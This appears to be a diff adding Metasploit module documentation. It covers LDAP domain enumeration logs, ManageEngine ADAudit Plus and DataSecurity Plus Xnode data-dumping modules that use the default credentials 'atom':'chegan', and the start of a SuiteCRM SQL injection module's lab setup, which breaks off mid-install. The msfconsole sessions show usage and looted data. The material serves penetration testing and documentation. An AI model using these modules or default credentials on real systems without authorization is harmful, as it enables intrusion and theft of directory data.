+[*] CN=Print Operators CN=Builtin DC=daforest DC=com
+================================================
+
+ Name       Attributes
+ ----       ----------
+ grouptype  -2147483643
+ name       Print Operators
+
+[*] CN=Backup Operators CN=Builtin DC=daforest DC=com
+=================================================
+
+ Name       Attributes
+ ----       ----------
+ grouptype  -2147483643
+ name       Backup Operators
+ 
+*cut for brevity*
+
+[*] CN=EL-chu-distlist1 OU=T2-Roles OU=Tier 2 OU=Admin DC=daforest DC=com
+=====================================================================
+
+ Name       Attributes
+ ----       ----------
+ grouptype  -2147483646
+ name       EL-chu-distlist1
+
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/ldap_query) > 
+```
+
+### ENUM_COMPUTERS with Table Output
+
+```
+msf6 payload(windows/x64/meterpreter/reverse_tcp) > use auxiliary/gather/ldap_query
+msf6 auxiliary(gather/ldap_query) > show options
+
+Module options (auxiliary/gather/ldap_query):
+
+   Name           Current Setting  Required  Description
+   ----           ---------------  --------  -----------
+   BASE_DN                         no        LDAP base DN if you already have it
+   BIND_DN                         no        The username to authenticate to LDAP server
+   BIND_PW                         no        Password for the BIND_DN
+   OUTPUT_FORMAT  table            yes       The output format to use (Accepted: csv, table, json)
+   RHOSTS                          yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-M
+                                             etasploit
+   RPORT          389              yes       The target port
+   SSL            false            no        Enable SSL on the LDAP connection
+
+msf6 auxiliary(gather/ldap_query) > set ACTION 
+set ACTION ENUM_ACCOUNTS             set ACTION ENUM_DOMAIN_CONTROLLERS   set ACTION ENUM_ORGROLES
+set ACTION ENUM_ALL_OBJECT_CATEGORY  set ACTION ENUM_EXCHANGE_RECIPIENTS  set ACTION ENUM_ORGUNITS
+set ACTION ENUM_ALL_OBJECT_CLASS     set ACTION ENUM_EXCHANGE_SERVERS     set ACTION RUN_QUERY_FILE
+set ACTION ENUM_COMPUTERS            set ACTION ENUM_GROUPS               
+msf6 auxiliary(gather/ldap_query) > set ACTION ENUM_COMPUTERS 
+ACTION => ENUM_COMPUTERS
+msf6 auxiliary(gather/ldap_query) > set RHOSTS 172.20.161.209
+RHOSTS => 172.20.161.209
+msf6 auxiliary(gather/ldap_query) > set BIND_PW thePassword123
+BIND_PW => thePassword123
+msf6 auxiliary(gather/ldap_query) > set BIND_DN normal@daforest.com
+BIND_DN => normal@daforest.com
+msf6 auxiliary(gather/ldap_query) > run
+[*] Running module against 172.20.161.209
+
+[+] Successfully bound to the LDAP server!
+[*] Discovering base DN automatically
+[+] 172.20.161.209:389 Discovered base DN: DC=daforest,DC=com
+[*] CN=WIN-F7DQC9SR0HD OU=Domain Controllers DC=daforest DC=com
+===========================================================
+
+ Name                    Attributes
+ ----                    ----------
+ distinguishedname       CN=WIN-F7DQC9SR0HD,OU=Domain Controllers,DC=daforest,DC=com
+ dnshostname             WIN-F7DQC9SR0HD.daforest.com
+ name                    WIN-F7DQC9SR0HD
+ operatingsystemversion  10.0 (20348)
+
+[*] CN=FSRWLPT1000000 OU=Testing DC=daforest DC=com
+===============================================
+
+ Name               Attributes
+ ----               ----------
+ description        Created with secframe.com/badblood.
+ displayname        FSRWLPT1000000
+ distinguishedname  CN=FSRWLPT1000000,OU=Testing,DC=daforest,DC=com
+ name               FSRWLPT1000000
+
+[*] CN=TSTWVIR1000000 OU=FSR OU=People DC=daforest DC=com
+=====================================================
+
+ Name               Attributes
+ ----               ----------
+ description        Created with secframe.com/badblood.
+ displayname        TSTWVIR1000000
+ distinguishedname  CN=TSTWVIR1000000,OU=FSR,OU=People,DC=daforest,DC=com
+ name               TSTWVIR1000000
+
+*cut for brevity*
+
+[*] CN=WVIR1000013 OU=Test OU=BDE OU=Tier 2 DC=daforest DC=com
+==========================================================
+
+ Name               Attributes
+ ----               ----------
+ description        Created with secframe.com/badblood.
+ displayname        WVIR1000013
+ distinguishedname  CN=WVIR1000013,OU=Test,OU=BDE,OU=Tier 2,DC=daforest,DC=com
+ name               WVIR1000013
+
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/ldap_query) > 
+```
+
+### ENUM_COMPUTERS with CSV Output
+```
+msf6 payload(windows/x64/meterpreter/reverse_tcp) > use auxiliary/gather/ldap_query             
+msf6 auxiliary(gather/ldap_query) > set ACTION ENUM_COMPUTERS 
+ACTION => ENUM_COMPUTERS
+msf6 auxiliary(gather/ldap_query) > set RHOSTS 172.20.161.209
+RHOSTS => 172.20.161.209
+msf6 auxiliary(gather/ldap_query) > set BIND_PW thePassword123
+BIND_PW => thePassword123
+msf6 auxiliary(gather/ldap_query) > set BIND_DN normal@daforest.com
+BIND_DN => normal@daforest.com
+msf6 auxiliary(gather/ldap_query) > set OUTPUT_FORMAT csv 
+OUTPUT_FORMAT => csv
+msf6 auxiliary(gather/ldap_query) > show options
+
+Module options (auxiliary/gather/ldap_query):
+
+   Name           Current Setting      Required  Description
+   ----           ---------------      --------  -----------
+   BASE_DN                             no        LDAP base DN if you already have it
+   BIND_DN        normal@daforest.com  no        The username to authenticate to LDAP server
+   BIND_PW        thePassword123       no        Password for the BIND_DN
+   OUTPUT_FORMAT  csv                  yes       The output format to use (Accepted: csv, table, json)
+   RHOSTS         172.20.161.209       yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Usi
+                                                 ng-Metasploit
+   RPORT          389                  yes       The target port
+   SSL            false                no        Enable SSL on the LDAP connection
+
+
+Auxiliary action:
+
+   Name            Description
+   ----            -----------
+   ENUM_COMPUTERS  Dump all objects containing an objectCategory of Computer.
+
+
+msf6 auxiliary(gather/ldap_query) > run
+[*] Running module against 172.20.161.209
+
+[+] Successfully bound to the LDAP server!
+[*] Discovering base DN automatically
+[+] 172.20.161.209:389 Discovered base DN: DC=daforest,DC=com
+[*] Name,Attributes
+"dn","CN=WIN-F7DQC9SR0HD,OU=Domain Controllers,DC=daforest,DC=com"
+"distinguishedname","CN=WIN-F7DQC9SR0HD,OU=Domain Controllers,DC=daforest,DC=com"
+"name","WIN-F7DQC9SR0HD"
+"operatingsystemversion","10.0 (20348)"
+"dnshostname","WIN-F7DQC9SR0HD.daforest.com"
+
+[*] Name,Attributes
+"dn","CN=FSRWLPT1000000,OU=Testing,DC=daforest,DC=com"
+"description","Created with secframe.com/badblood."
+"distinguishedname","CN=FSRWLPT1000000,OU=Testing,DC=daforest,DC=com"
+"displayname","FSRWLPT1000000"
+"name","FSRWLPT1000000"
+
+[*] Name,Attributes
+"dn","CN=TSTWVIR1000000,OU=FSR,OU=People,DC=daforest,DC=com"
+"description","Created with secframe.com/badblood."
+"distinguishedname","CN=TSTWVIR1000000,OU=FSR,OU=People,DC=daforest,DC=com"
+"displayname","TSTWVIR1000000"
+"name","TSTWVIR1000000"
+
+*cut for brevity*
+
+[*] Name,Attributes
+"dn","CN=WVIR1000013,OU=Test,OU=BDE,OU=Tier 2,DC=daforest,DC=com"
+"description","Created with secframe.com/badblood."
+"distinguishedname","CN=WVIR1000013,OU=Test,OU=BDE,OU=Tier 2,DC=daforest,DC=com"
+"displayname","WVIR1000013"
+"name","WVIR1000013"
+
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/ldap_query) > 
+```
+
+### ENUM_COMPUTERS with JSON Output
+```
+msf6 payload(windows/x64/meterpreter/reverse_tcp) > use auxiliary/gather/ldap_query             
+msf6 auxiliary(gather/ldap_query) > set ACTION ENUM_COMPUTERS 
+ACTION => ENUM_COMPUTERS
+msf6 auxiliary(gather/ldap_query) > set RHOSTS 172.20.161.209
+RHOSTS => 172.20.161.209
+msf6 auxiliary(gather/ldap_query) > set BIND_PW thePassword123
+BIND_PW => thePassword123
+msf6 auxiliary(gather/ldap_query) > set BIND_DN normal@daforest.com
+BIND_DN => normal@daforest.com
+msf6 auxiliary(gather/ldap_query) > set OUTPUT_FORMAT json 
+OUTPUT_FORMAT => json
+msf6 auxiliary(gather/ldap_query) > show options
+
+Module options (auxiliary/gather/ldap_query):
+
+   Name           Current Setting      Required  Description
+   ----           ---------------      --------  -----------
+   BASE_DN                             no        LDAP base DN if you already have it
+   BIND_DN        normal@daforest.com  no        The username to authenticate to LDAP server
+   BIND_PW        thePassword123       no        Password for the BIND_DN
+   OUTPUT_FORMAT  json                 yes       The output format to use (Accepted: csv, table, json)
+   RHOSTS         172.20.161.209       yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Usi
+                                                 ng-Metasploit
+   RPORT          389                  yes       The target port
+   SSL            false                no        Enable SSL on the LDAP connection
+
+
+Auxiliary action:
+
+   Name            Description
+   ----            -----------
+   ENUM_COMPUTERS  Dump all objects containing an objectCategory of Computer.
+
+
+msf6 auxiliary(gather/ldap_query) > run
+[*] Running module against 172.20.161.209
+
+[+] Successfully bound to the LDAP server!
+[*] Discovering base DN automatically
+[+] 172.20.161.209:389 Discovered base DN: DC=daforest,DC=com
+[*] CN=WIN-F7DQC9SR0HD OU=Domain Controllers DC=daforest DC=com
+{
+  "dn": "CN=WIN-F7DQC9SR0HD,OU=Domain Controllers,DC=daforest,DC=com",
+  "distinguishedname": "CN=WIN-F7DQC9SR0HD,OU=Domain Controllers,DC=daforest,DC=com",
+  "name": "WIN-F7DQC9SR0HD",
+  "operatingsystemversion": "10.0 (20348)",
+  "dnshostname": "WIN-F7DQC9SR0HD.daforest.com"
+}
+[*] CN=FSRWLPT1000000 OU=Testing DC=daforest DC=com
+{
+  "dn": "CN=FSRWLPT1000000,OU=Testing,DC=daforest,DC=com",
+  "description": "Created with secframe.com/badblood.",
+  "distinguishedname": "CN=FSRWLPT1000000,OU=Testing,DC=daforest,DC=com",
+  "displayname": "FSRWLPT1000000",
+  "name": "FSRWLPT1000000"
+}
+[*] CN=TSTWVIR1000000 OU=FSR OU=People DC=daforest DC=com
+{
+  "dn": "CN=TSTWVIR1000000,OU=FSR,OU=People,DC=daforest,DC=com",
+  "description": "Created with secframe.com/badblood.",
+  "distinguishedname": "CN=TSTWVIR1000000,OU=FSR,OU=People,DC=daforest,DC=com",
+  "displayname": "TSTWVIR1000000",
+  "name": "TSTWVIR1000000"
+}
+*cut for brevity*
+[*] CN=WLPT1000014 OU=AZR OU=Stage DC=daforest DC=com
+{
+  "dn": "CN=WLPT1000014,OU=AZR,OU=Stage,DC=daforest,DC=com",
+  "description": "Created with secframe.com/badblood.",
+  "distinguishedname": "CN=WLPT1000014,OU=AZR,OU=Stage,DC=daforest,DC=com",
+  "displayname": "WLPT1000014",
+  "name": "WLPT1000014"
+}
+[*] CN=WWKS1000016 OU=T1-Roles OU=Tier 1 OU=Admin DC=daforest DC=com
+{
+  "dn": "CN=WWKS1000016,OU=T1-Roles,OU=Tier 1,OU=Admin,DC=daforest,DC=com",
+  "description": "Created with secframe.com/badblood.",
+  "distinguishedname": "CN=WWKS1000016,OU=T1-Roles,OU=Tier 1,OU=Admin,DC=daforest,DC=com",
+  "displayname": "WWKS1000016",
+  "name": "WWKS1000016"
+}
+[*] CN=WVIR1000013 OU=Test OU=BDE OU=Tier 2 DC=daforest DC=com
+{
+  "dn": "CN=WVIR1000013,OU=Test,OU=BDE,OU=Tier 2,DC=daforest,DC=com",
+  "description": "Created with secframe.com/badblood.",
+  "distinguishedname": "CN=WVIR1000013,OU=Test,OU=BDE,OU=Tier 2,DC=daforest,DC=com",
+  "displayname": "WVIR1000013",
+  "name": "WVIR1000013"
+}
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/ldap_query) > 
+```
@@ -0,0 +1,156 @@
+## Vulnerable Application
+The module exploits default admin credentials for the DataEngine Xnode server in ADAudit Plus versions prior to 6.0.3 (6032)
+in order to dump the contents of Xnode data repositories (tables), which may contain varying amounts of Active Directory information
+including domain names, host names, usernames and SIDs. The module can also be used against patched ADAudit Plus
+versions if the correct credentials are provided.
+
+The module's `check` method attempts to authenticate to the remote Xnode server. The default credentials are `atom`:`chegan`.
+If the credentials are valid, the module will perform a few requests to the Xnode server to obtain information like the Xnode version.
+This is mostly done as a sanity check to ensure the Xnode server is working as expected.
+
+Next, the module will iterate over a list of known Xnode data repositories and perform several requests for each in order to:
+- Check if the data repository is configured on the target
+- Obtain the total number of records in the data repository
+- Obtain both the lowest and the highest value for the ID field (column). These values will be used
+to determine the range of possible records to be queried.
+
+If a given data repository exists, the module uses the above information to dump the data repository contents.
+The maximum number of records returned for a search query is 10. To overcome this, the module performs series of requests
+using the `dr:/dr_search` action, while specifying the ID values for each record.
+For example, if the lowest observed ID value is 15 and the highest is 41, the module will perform three requests:
+1. A request for the records with ID values 15 to 24
+2. A request for the records with ID values 25 to 34
+3. A request for the records with ID values 35 to 41
+Empty records are ignored.
+
+To view the raw Xnode requests and responses, enter `set VERBOSE true` before running the module.
+
+By default, the module dumps only the data repositories (tables) and fields (columns) specified in the configuration file.
+The configuration file can be set via the `CONFIG_FILE` option, but this is not required because
+a default config file exists at `data/exploits/manageengine_xnode/CVE-2020-11532/adaudit_plus_xnode_conf.yaml` that will
+be used if `CONFIG_FILE` is not set.
+
+The configuration file is also used to add labels to the values sent by Xnode in response to a query.
+This means that for every value in the Xnode response, the module will add the corresponding field name to the results
+before writing those to a JSON file in `~/.msf4/loot`.
+
+It is also possible to use the `DUMP_ALL` option to obtain all data in all known data repositories without specifying data field names.
+However, note that when using this option the data won't be labeled.
+
+This module has been successfully tested against ManageEngine ADAudit Plus 6.0.3 (6031) running on Windows Server 2012 R2
+and ADAudit Plus 6.0.7 (6076) running on Windows Server 2019.
+
+## Installation Information
+Vulnerable versions of ADAudit Plus are available [here](https://archives2.manageengine.com/active-directory-audit/).
+All versions from 6000 through 6031 are configured with default Xnode credentials. Note that testing against
+vulnerable versions from the archives will make data enumeration impossible because the free trials for those
+versions do not seem to allow ADAudit Plus to actually start collecting data that can then be accessed via Xnode.
+
+However, apart from some configuration changes, Xnode functions the same way on patched versions as it does on vulnerable versions,
+so it is possible to test the modules against patched versions as long as the correct credentials are provided.
+
+A free 30-day trial of the latest version of ADAudit Plus can be downloaded
+[here](https://www.manageengine.com/products/active-directory-audit/download.html). To install, just run the .exe and follow the instructions.
+
+In order to configure a patched ManageEngine ADAudit Plus instance for testing, follow these steps:
+- Open the Xnode config file at `<install_dir>\apps\dataengine-xnode\conf\dataengine-xnode.conf`
+- Note down the username and password
+- Insert the following line:
+```
+xnode.connector.accept_remote_request = true
+```
+To launch ADAudit Plus, run Command Prompt as administrator and run: `<install_dir>\bin\run.bat`
+
+## Verification Steps
+1. Start msfconsole
+2. Do: `use auxiliary/gather/manageengine_adaudit_plus_xnode_enum`
+3. Do: `set RHOSTS [IP]`
+4. Do: `run`
+
+## Options
+### CONFIG_FILE
+YAML File specifying the data repositories (tables) and fields (columns) to dump.
+
+### DUMP_ALL
+Dump all data from the available data repositories (tables). If true, CONFIG_FILE will be ignored.
+
+## Scenarios
+### ManageEngine ADAudit Plus 6.0.3 (6031) running on Windows Server 2012 R2
+```
+msf6 auxiliary(gather/manageengine_adaudit_plus_xnode_enum) > options
+
+Module options (auxiliary/gather/manageengine_adaudit_plus_xnode_enum):
+
+   Name         Current Setting                                                Required  Description
+   ----         ---------------                                                --------  -----------
+   CONFIG_FILE  /home/wynter/dev/metasploit-framework/data/exploits/manageeng  no        YAML file specifying the data repositories (tables) and fields (columns) to dump
+                ine_xnode/CVE-2020-11532/adaudit_plus_xnode_conf.yaml
+   DUMP_ALL     false                                                          no        Dump all data from the available data repositories (tables). If true, CONFIG_FILE will be ignored.
+   PASSWORD     chegan                                                         yes       Password used to authenticate to the Xnode server
+   RHOSTS       192.168.1.41                                                   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT        29118                                                          yes       The target port (TCP)
+   USERNAME     atom                                                           yes       Username used to authenticate to the Xnode server
+
+msf6 auxiliary(gather/manageengine_adaudit_plus_xnode_enum) > run
+[*] Running module against 192.168.1.41
+
+[*] 192.168.1.41:29118 - Running automatic check ("set AutoCheck false" to disable)
+[*] 192.168.1.41:29118 - Target seems to be Xnode.
+[+] 192.168.1.41:29118 - The target appears to be vulnerable. Successfully authenticated to the Xnode server.
+[*] 192.168.1.41:29118 - Obtained expected Xnode "de_healh" status: "GREEN".
+[*] 192.168.1.41:29118 - Target is running Xnode version: "XNODE_1_0_0".
+[*] 192.168.1.41:29118 - Obtained Xnode installation path: "C:\Program Files (x86)\ManageEngine\ADAudit Plus\apps\dataengine-xnode".
+[*] 192.168.1.41:29118 - Data repository AdapFileAuditLog is empty.
+[*] 192.168.1.41:29118 - The data repository AdapPowershellAuditLog is not available on the target.
+[*] 192.168.1.41:29118 - The data repository AdapSysMonAuditLog is not available on the target.
+[*] 192.168.1.41:29118 - The data repository AdapDNSAuditLog is not available on the target.
+[*] 192.168.1.41:29118 - The data repository AdapADReplicationAuditLog is not available on the target.
+[*] Auxiliary module execution completed
+```
+
+### ManageEngine ADAudit Plus 6.0.7 (6076) running on Windows Server 2019 (custom password)
+```
+msf6 > use auxiliary/gather/manageengine_adaudit_plus_xnode_enum
+msf6 auxiliary(gather/manageengine_adaudit_plus_xnode_enum) > set rhosts 192.168.1.25
+rhosts => 192.168.1.25
+msf6 auxiliary(gather/manageengine_adaudit_plus_xnode_enum) > set password custom_password
+password => custom_password
+msf6 auxiliary(gather/manageengine_adaudit_plus_xnode_enum) > options 
+
+Module options (auxiliary/gather/manageengine_adaudit_plus_xnode_enum):
+
+   Name         Current Setting                                                                                                 Required  Description
+   ----         ---------------                                                                                                 --------  -----------
+   CONFIG_FILE  /root/github/manageengine/metasploit-framework/data/exploits/manageengine_xnode/CVE-2020-11532/adaudit_plus_xn  no        YAML file specifying the data repositories (tables) and fields (columns) to dump
+                ode_conf.yaml
+   DUMP_ALL     false                                                                                                           no        Dump all data from the available data repositories (tables). If true, CONFIG_FILE will be ignored.
+   PASSWORD     custom_password                                                                                                 yes       Password used to authenticate to the Xnode server
+   RHOSTS       192.168.1.25                                                                                                    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT        29118                                                                                                           yes       The target port (TCP)
+   USERNAME     atom                                                                                                            yes       Username used to authenticate to the Xnode server
+
+msf6 auxiliary(gather/manageengine_adaudit_plus_xnode_enum) > run
+
+[*] Running module against 192.168.1.25
+
+[*] 192.168.1.25:29118 - Running automatic check ("set AutoCheck false" to disable)
+[+] 192.168.1.25:29118 - The target appears to be vulnerable. Successfully authenticated to the Xnode server.
+[*] 192.168.1.25:29118 - Obtained expected Xnode "de_healh" status: "GREEN".
+[*] 192.168.1.25:29118 - Target is running Xnode version: "DataEngine-XNode 1.1.0 (1100)".
+[*] 192.168.1.25:29118 - Obtained Xnode installation path: "C:\Program Files\ManageEngine\ADAudit Plus\apps\dataengine-xnode".
+[*] 192.168.1.25:29118 - Data repository AdapFileAuditLog is empty.
+[+] 192.168.1.25:29118 - Data repository AdapPowershellAuditLog contains 261 records with ID numbers between 1.0 and 303.0.
+[*] 192.168.1.25:29118 - Data repository AdapSysMonAuditLog is empty.
+[+] 192.168.1.25:29118 - Data repository AdapDNSAuditLog contains 722 records with ID numbers between 1.0 and 926.0.
+[*] 192.168.1.25:29118 - Data repository AdapADReplicationAuditLog is empty.
+[*] 192.168.1.25:29118 - Attempting to request 261 records for data repository AdapPowershellAuditLog between IDs 1 and 303. This could take a while...
+[*] 192.168.1.25:29118 - Processed 25 queries (max 10 records per query) so far. The last queried record ID was 250. The max ID is 303...
+[+] 192.168.1.25:29118 - Saving 261 records from the AdapPowershellAuditLog data repository to /root/.msf4/loot/20220610073738_default_192.168.1.25_xnode_powershell_099421.json
+[*] 192.168.1.25:29118 - Attempting to request 722 records for data repository AdapDNSAuditLog between IDs 1 and 926. This could take a while...
+[*] 192.168.1.25:29118 - Processed 25 queries (max 10 records per query) so far. The last queried record ID was 250. The max ID is 926...
+[*] 192.168.1.25:29118 - Processed 50 queries (max 10 records per query) so far. The last queried record ID was 500. The max ID is 926...
+[*] 192.168.1.25:29118 - Processed 75 queries (max 10 records per query) so far. The last queried record ID was 750. The max ID is 926...
+[+] 192.168.1.25:29118 - Saving 722 records from the AdapDNSAuditLog data repository to /root/.msf4/loot/20220610073754_default_192.168.1.25_xnode_dnsaudit_775121.json
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/manageengine_adaudit_plus_xnode_enum) >
+```
@@ -0,0 +1,114 @@
+## Vulnerable Application
+The module exploits default admin credentials for the DataEngine Xnode server in DataSecurity Plus versions prior to 6.0.1 (6011)
+in order to dump the contents of Xnode data repositories (tables), which may contain varying amounts of Active Directory information
+including domain names, host names, usernames and SIDs. The module can also be used against patched 
+DataSecurity Plus versions if the correct credentials are provided.
+
+The module's `check` method attempts to authenticate to the remote Xnode server. The default credentials are `atom`:`chegan`.
+If the credentials are valid, the module will perform a few requests to the Xnode server to obtain information like the Xnode version.
+This is mostly done as a sanity check to ensure the Xnode server is working as expected.
+
+Next, the module will iterate over a list of known Xnode data repositories and perform several requests for each in order to:
+- Check if the data repository is configured on the target
+- Obtain the total number of records in the data repository
+- Obtain both the lowest and the highest value for the ID field (column). These values will be used
+to determine the range of possible records to be queried.
+
+If a given data repository exists, the module uses the above information to dump the data repository contents.
+The maximum number of records returned for a search query is 10. To overcome this, the module performs series of requests
+using the `dr:/dr_search` action, while specifying the ID values for each record.
+For example, if the lowest observed ID value is 15 and the highest is 41, the module will perform three requests:
+1. A request for the records with ID values 15 to 24
+2. A request for the records with ID values 25 to 34
+3. A request for the records with ID values 35 to 41
+Empty records are ignored.
+
+To view the raw Xnode requests and responses, enter `set VERBOSE true` before running the module.
+
+By default, the module dumps only the data repositories (tables) and fields (columns) specified in the configuration file.
+The configuration file can be set via the `CONFIG_FILE` option, but this is not required because
+a default config file exists at `data/exploits/manageengine_xnode/CVE-2020-11532/datasecurity_plus_xnode_conf.yaml`
+that will be used if `CONFIG_FILE` is not set.
+
+The configuration file is then also used to add labels to the values sent by Xnode in response to a query.
+This means that for every value in the Xnode response, the module will add the corresponding field name to the results
+before writing those to a JSON file in `~/.msf4/loot`.
+
+It is also possible to use the `DUMP_ALL` option to obtain all data in all known data repositories without specifying data field names.
+However, note when using this option the data won't be labeled.
+
+This module has been successfully tested against DataSecurity Plus 6.0.1 (6010) running on Windows Server 2012 R2.
+
+## Installation Information
+Vulnerable versions of DataSecurity Plus are available [here](https://archives.manageengine.com/data-security/).
+All versions from 6000 through 6011 are configured with default Xnode credentials. Note that testing against
+vulnerable versions from the archives will make data enumeration impossible because the free trials for those
+versions do not seem to allow ADAudit Plus to actually start collecting data that can then be accessed via Xnode.
+
+However, apart from some configuration changes, Xnode functions the same way on patched versions as it does on vulnerable versions,
+so it is possible to test the modules against patched versions as long as the correct credentials are provided.
+
+A free 30-day trial of DataSecurity Plus can be downloaded [here](https://www.manageengine.com/data-security/download.html).
+To install, just run the .exe and follow the instructions.
+
+In order to configure a patched ManageEngine DataSecurity Plus instance for testing, follow these steps:
+- Open the Xnode config file at `<install_dir>\apps\dataengine-xnode\conf\dataengine-xnode.conf`
+- Note down the username and password
+- Insert the following line:
+```
+xnode.connector.accept_remote_request = true
+```
+To launch DataSecurity Plus, run Command Prompt as administrator and run: `<install_dir>\bin\run.bat`
+
+## Verification Steps
+1. Start msfconsole
+2. Do: `use auxiliary/gather/manageengine_datasecurity_plus_xnode_enum`
+3. Do: `set RHOSTS [IP]`
+4. Do: `run`
+
+## Options
+### CONFIG_FILE
+YAML File specifying the data repositories (tables) and fields (columns) to dump.
+
+### DUMP_ALL
+Dump all data from the available data repositories (tables). If true, CONFIG_FILE will be ignored.
+
+## Scenarios
+### ManageEngine DataSecurity Plus 6.0.1 (6010) on Windows Server 2012
+```
+msf6 auxiliary(gather/manageengine_datasecurity_plus_xnode_enum) > options 
+
+Module options (auxiliary/gather/manageengine_datasecurity_plus_xnode_enum):
+
+   Name         Current Setting                                                Required  Description
+   ----         ---------------                                                --------  -----------
+   CONFIG_FILE  /home/wynter/dev/metasploit-framework/data/exploits/manageeng  no        YAML file specifying the data repositories (tables) and fields (columns) to dump
+                ine_xnode/CVE-2020-11532/datasecurity_plus_xnode_conf.yaml
+   DUMP_ALL     false                                                          no        Dump all data from the available data repositories (tables). If true, CONFIG_FILE will be ignored.
+   PASSWORD     chegan                                                         yes       Password used to authenticate to the Xnode server
+   RHOSTS       192.168.1.41                                                   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT        29119                                                          yes       The target port (TCP)
+   USERNAME     atom                                                           yes       Username used to authenticate to the Xnode server
+
+msf6 auxiliary(gather/manageengine_datasecurity_plus_xnode_enum) > run
+[*] Running module against 192.168.1.41
+
+[*] 192.168.1.41:29119 - Running automatic check ("set AutoCheck false" to disable)
+[*] 192.168.1.41:29119 - Target seems to be Xnode.
+[+] 192.168.1.41:29119 - The target appears to be vulnerable. Successfully authenticated to the Xnode server.
+[*] 192.168.1.41:29119 - Obtained expected Xnode "de_healh" status: "GREEN".
+[*] 192.168.1.41:29119 - Target is running Xnode version: "XNODE_1_0_0".
+[*] 192.168.1.41:29119 - Obtained Xnode installation path: "C:\Program Files (x86)\ManageEngine\DataSecurity Plus\apps\dataengine-xnode".
+[*] 192.168.1.41:29119 - Data repository DSPEmailAuditAttachments is empty.
+[*] 192.168.1.41:29119 - Data repository DSPEmailAuditReport is empty.
+[*] 192.168.1.41:29119 - Data repository DSPEndpointAuditReport is empty.
+[*] 192.168.1.41:29119 - Data repository DSPEndpointClassificationReport is empty.
+[*] 192.168.1.41:29119 - Data repository DSPEndpointIncidentReport is empty.
+[*] 192.168.1.41:29119 - Data repository DspEndpointPrinterAuditReport is empty.
+[*] 192.168.1.41:29119 - Data repository DspEndpointWebAuditReport is empty.
+[*] 192.168.1.41:29119 - Data repository DSPFileAnalysisAlerts is empty.
+[*] 192.168.1.41:29119 - Data repository RAAlertHistory is empty.
+[*] 192.168.1.41:29119 - Data repository RAIncidents is empty.
+[*] 192.168.1.41:29119 - Data repository RAViolationRecords is empty.
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,195 @@
+## Description
+This module exploits an authenticated SQL injection in SuiteCRM installations below or equal to version 7.12.5. The 
+vulnerability allows for union and blind boolean based SQLi to be exploited in order to collect usernames and password 
+hashes from the SuiteCRM database.
+
+## Vulnerable Application
+
+The SQLi exploited by this module depends on the existence of at least one 'Account' being registered in SuiteCRM.
+There should be one in SuiteCRM by default for the administrative user. If you want to test multiple users,
+browse to `/index.php?module=Users&action=index` and then click the `Create New User` button on the left side
+of the screen. Then enter a username and a last name. Then click the `password` tab, and enter a password for
+the user, then confirm this password and click the `Save` button to create the user.
+
+### Docker compose
+
+**Prerequisites:** [Docker](https://docs.docker.com/get-docker/) and
+[Docker Compose](https://docs.docker.com/compose/install/) must be
+installed first.
+
+To create a SuiteCRM 7.12.5 Docker container, first create a new folder, 
+then save the following content as `docker-compose.yml`:
+
+```
+version: '2'
+services:
+  mariadb:
+    image: docker.io/bitnami/mariadb:10.6
+    environment:
+      # ALLOW_EMPTY_PASSWORD is recommended only for development.
+      - ALLOW_EMPTY_PASSWORD=yes
+      - MARIADB_USER=bn_suitecrm
+      - MARIADB_DATABASE=bitnami_suitecrm
+      - MARIADB_PASSWORD=bitnami123
+    volumes:
+      - 'mariadb_data:/bitnami/mariadb'
+  suitecrm:
+    image: docker.io/bitnami/suitecrm:7.12.5
+    ports:
+      - '80:8080'
+      - '443:8443'
+    environment:
+      - SUITECRM_DATABASE_HOST=mariadb
+      - SUITECRM_DATABASE_PORT_NUMBER=3306
+      - SUITECRM_DATABASE_USER=bn_suitecrm
+      - SUITECRM_DATABASE_NAME=bitnami_suitecrm
+      - SUITECRM_DATABASE_PASSWORD=bitnami123
+      # ALLOW_EMPTY_PASSWORD is recommended only for development.
+      - ALLOW_EMPTY_PASSWORD=yes
+    volumes:
+      - 'suitecrm_data:/bitnami/suitecrm'
+    depends_on:
+      - mariadb
+volumes:
+  mariadb_data:
+    driver: local
+  suitecrm_data:
+    driver: local 
+```
+
+Finally, in the same directory as the `docker-compose.yml` file, run: `docker-compose up -d`.
+
+Note that the default username to log in will be `user` and the password will be `bitnami`. If you
+want to change these, put the following lines under the `environment` section:
+
+```
+    environment:
+      - SUITECRM_USERNAME=my_user
+      - SUITECRM_PASSWORD=my_password
+```
+
+The above would set the username to `my_user` and the password to `my_password`.
+
+For more information on the docker compose file, refer to
+https://github.com/bitnami/containers/tree/main/bitnami/suitecrm.
+
+### Install from source
+
+Source code can be found here: [SuiteCRM v7.12.5](https://github.com/salesagility/SuiteCRM/archive/refs/tags/v7.12.5.tar.gz) 
+
+Instructions on installing from source can be found here: [Installation Guide](https://docs.suitecrm.com/admin/installation-guide/downloading-installing/) 
+
+The following setup was installed on Ubuntu 20.04:
+
+1. Setup and install MySQL:
+    1. `sudo apt update`
+    1. `sudo apt install mysql-server`
+    1. `sudo systemctl start mysql.service`
+    1. `sudo mysql` (open the mysql prompt)
+    1. `mysql> ALTER USER 'root'@'localhost' IDENTIFIED WITH mysql_native_password BY 'password';` (change the password 
+       of the root user)
+       
+1. Install Apache
+    1. `sudo apt install apache2`
+    1. `sudo systemctl enable apache2`
+    1. `sudo systemctl start apache2`
+       
+1. Install php and its dependencies
+    1. `sudo apt -y install php7.4`
+    1. `sudo apt install -y php-cli php-common php-curl php-mbstring php-gd php-mysql php-soap php-xml php-imap php-intl php-opcache php-json php-zip`
+    1. `sudo apt install composer`
+    1. `composer install`
+    
+1. Setup and install SuiteCRM 7.12.5
+    1. `wget https://github.com/salesagility/SuiteCRM/archive/refs/tags/v7.12.5.tar.gz`
+    1. `gunzip v7.12.5.tar.gz`
+    1. `tar -xvf v7.12.5.tar`
+    1. `sudo cp -r SuiteCRM-7.12.5/. /var/www/html`
+    1. `cd /var/www/html`
